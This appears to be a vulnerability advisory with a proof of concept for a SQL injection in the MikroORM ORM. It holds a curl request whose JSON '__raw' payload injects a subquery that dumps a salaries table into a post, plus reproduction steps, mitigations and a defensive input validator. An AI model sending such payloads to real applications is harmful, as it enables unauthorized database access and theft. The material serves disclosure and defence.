Description
MikroORM versions 7.0.5 and below suffer from a remote SQL injection vulnerability...
Basic Information
ID: PACKETSTORM:220501
Published: May 6, 2026 at 00:00
# CVE-2026-43220 MikroORM SQL Injection
★ CVE-2026-43220 MikroORM SQL Injection PoC ★
https://github.com/user-attachments/assets/33724cfc-6151-47ff-9415-2f50c5124cd1
<br>
# Overview
> **CVE-2026-43220** is a **SQL Injection** vulnerability in **MikroORM**, a widely used TypeScript/Node.js ORM framework.
> When a user-supplied value containing a `__raw` property is passed to a **Custom Type column** without validation, MikroORM's `isRaw()` check identifies it as a trusted internal Raw SQL expression and inserts the attacker-controlled `sql` value directly into the generated query without type conversion or sanitization, causing **unintended execution of arbitrary SQL**.
<br>
# Affected Versions
| Category | Version |
|---|---|
| **Vulnerable** | MikroORM **version ≤ 6.4.3** & **7.0.0 ≤ version ≤ 7.0.5** |
| **Patched** | MikroORM **6.4.4** & **7.0.6** |
<br>
# Impact
- Exfiltration of sensitive data from the database without authorization
- Corruption or unintended modification of existing database records
<br>
# Environment
```bash
docker build -t cve-2026-43220-mikroorm-vuln .
docker run --rm -it -p 3000:3000 --name mikroorm-vuln cve-2026-43220-mikroorm-vuln
```
<br>
# PoC
After starting the vulnerable environment, follow the steps below to reproduce the attack.
## Step 1. Send a request with a malicious payload containing `__raw`
Send a JSON body that includes a `__raw` property targeting a Custom Type column.
```bash
curl -X POST http://localhost:3000/write \
  -H "Content-Type: application/json" \
  -d '{
    "author": "x",
    "title": "x",
    "content": {
      "__raw": true,
      "sql": "(SELECT group_concat(name || '"'"': '"'"' || salary, '"'"' / '"'"') FROM salaries)"
    }
  }'
```
## Step 2. Check the HTTP response
Verify that the API returns a successful response without any error,
indicating that MikroORM accepted the malicious payload as a valid value.
## Step 3. Confirm sensitive data is exfiltrated into post content
Verify that the `content` field of the created post contains the query result
from the `salaries` table (e.g., `Alice: 5000 / Bob: 7000 / ...`),
confirming that data from an unrelated table has been silently embedded
into the response without any error or access control violation.
<br>
# Mitigation
- Upgrade to **MikroORM 6.4.4** or later, which introduces origin verification in `isRaw()` to reject externally supplied `__raw` properties
- Apply **whitelist-based input validation** to reject unexpected properties such as `__raw` before passing values to the ORM layer
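The second mitigation, as an added example that is not part of this PoC or of MikroORM itself: an allowlist validator for the `/write` body that rejects the `__raw` marker described in the Overview before the value reaches the ORM. It assumes the post entity has exactly `author`, `title` and `content`, and `looksLikeRawSql` is a simplified model of the duck-typing described above, not MikroORM's own `isRaw()`.

```javascript
// Added example, not MikroORM's code. Assumption: the post entity has exactly
// author, title and content; content is a JSON-typed custom column that may
// hold plain data but must never be interpreted as raw SQL.
const ALLOWED_TOP_LEVEL = new Set(['author', 'title', 'content']);

// Simplified model of the check the advisory describes: an object carrying a
// truthy `__raw` plus an `sql` string is what the ORM would trust as raw SQL.
function looksLikeRawSql(value) {
  return value !== null && typeof value === 'object' &&
    value.__raw === true && typeof value.sql === 'string';
}

// Walk the value recursively and report the first dunder-prefixed key (such as
// `__raw`), so a marker nested inside arrays or sub-objects cannot slip through.
function containsReservedKey(value, path = 'content') {
  if (Array.isArray(value)) {
    for (let i = 0; i < value.length; i++) {
      const hit = containsReservedKey(value[i], `${path}[${i}]`);
      if (hit) return hit;
    }
    return null;
  }
  if (value !== null && typeof value === 'object') {
    for (const key of Object.keys(value)) {
      if (key.startsWith('__')) return `${path}.${key}`;
      const hit = containsReservedKey(value[key], `${path}.${key}`);
      if (hit) return hit;
    }
  }
  return null;
}

// Allowlist the top-level shape, then refuse anything that resembles raw SQL.
// Returns { ok: true, value } with a freshly built object, or { ok: false, error }.
function validateWriteBody(body) {
  if (body === null || typeof body !== 'object' || Array.isArray(body)) {
    return { ok: false, error: 'body must be a JSON object' };
  }
  for (const key of Object.keys(body)) {
    if (!ALLOWED_TOP_LEVEL.has(key)) return { ok: false, error: `unexpected property: ${key}` };
  }
  if (typeof body.author !== 'string' || typeof body.title !== 'string') {
    return { ok: false, error: 'author and title must be strings' };
  }
  if (looksLikeRawSql(body.content)) return { ok: false, error: 'content carries a raw SQL marker' };
  const reserved = containsReservedKey(body.content);
  if (reserved) return { ok: false, error: `reserved key at ${reserved}` };
  return { ok: true, value: { author: body.author, title: body.title, content: body.content } };
}
```

Run the validator on the parsed request body and pass only `result.value` to the entity; the rejection reason is safe to log for detection of attempts.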
<br>
# Analysis
- KR: https://www.skshieldus.com/security-insights/reports/eqst-orm-injection-explained
- EN: